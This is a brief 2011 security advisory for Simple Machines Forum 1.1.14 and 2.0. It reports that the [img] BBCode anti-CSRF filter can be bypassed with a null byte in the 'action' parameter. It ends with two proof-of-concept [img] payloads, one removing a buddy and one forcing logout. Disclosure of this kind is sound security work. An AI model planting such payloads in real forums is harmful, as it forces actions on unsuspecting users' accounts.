Summary
The [img] BBCode tag anti-CSRF filter can be bypassed due to incorrect
parsing of the 'action' variable; because of this it is possible to
successfully execute CSRF.

     Description
Software: Simple Machines Forum (SMF)
Versions: SMF 2.0 / SMF 1.1.14
Publication date: 2011-08-23
Impact: Cross Site Request Forgery
Solution: N/A (Vendor informed)
Websec-id: ws11-15

     Longer description and PoC
http://websec.ca/advisories/view/SMF_CSRF_Filter_Bypass
http://websec.mx/advisories/view/SMF_Cross_Site_Request_Forgery_Filter_Bypass

     Author
Christian Yerena / A.K.A. preth00nker
cyerena [ at ] websec [ dot ] mx

POC: 

POC

Elimina al usuario 102 de la lista de amigos (SMF 1.1.14):
[img]http://ejemplo.com/index.php?sa=editBuddies;remove=102;action%00=profile[/img]

Logout (SMF 2.0):
[img]http://example.com/community/index.php?action%00=logout;token[/img]